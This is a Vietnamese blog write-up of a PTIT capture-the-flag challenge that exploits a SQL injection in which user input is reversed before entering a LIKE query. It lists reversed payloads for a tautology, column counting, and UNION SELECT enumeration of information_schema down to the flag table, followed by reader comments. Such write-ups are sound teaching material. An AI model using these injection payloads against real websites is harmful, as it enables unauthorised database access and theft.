PTIT

Hello mọi người vẫn là K0n vip pro đây :>

lại là 1 chall khác, lần này liên quan đến lỗi si cồ in jec sần (SQL injection)

mình có một trang vậy, test thử thôi
Nhập thử dấu nháy đơn, có vẻ nó đã bị sao đó. Sau 1 hồi fuzz mình nhập thử iw thì thấy có kết quả trả về
Có thể thấy iw là reverse của chữ wi có trong username. kết hợp với tên đề bài mình có thể đoán đoạn query như này
SELECT id,username,email from users where username like " '% "+strrev($_GET['username'])+" %' "
Ở đây mình sẽ sử dụng python giúp mình chuyển đổi cách câu lệnh thành rev
kết quả thu được như sau, vậy là mình có thể SQl một cách dễ dàng.
Payload: #'1'='1'ro'


Mình muốn tìm xem có bao nhiêu cột: payload #4 yb redro'
Xác nhận nó có 3 cột.


Xác định nó đang dùng mysql nên dễ dàng tìm được databases của nó.
Payload: #atamehcs.amehcs_noitamrofni morf eman_amehcs,llun,llun tceles noinu'

Thấy database sqli khả nghi, thử tìm table. Và thấy 2 table là flag và user.
Payload: #'ilqs'=amehcs_elbat eReHw selbat.amehcs_noitamrofni morf eman_elbat,llun,llun tceles noinu'
Thử tìm column
Payload: #'galf'=eman_elbat eReHw snmuloc.amehcs_noitamrofni morf eman_nmuloc,llun,llun tceles noinu'
Có 1 column tên flag, bây giờ chỉ cần select nó là được rồi.
Payload: #galf morf galf,llun,llun tceles noinu'

Nice~su









Nhận xét

  1. Post method mà đại ca, à mà a là e lười sửa =))

    Trả lờiXóa
  2. Cái mình cần đây rồi , thank cậu nhá

    Trả lờiXóa
    Trả lời
    1. đề nghị đồng chí mở tên ra để anh em chúng tôi được biết bí danh :D

      Xóa

Đăng nhận xét

Bài đăng phổ biến từ blog này

KMACTF và nỗi buồn éo làm được gì cả T__T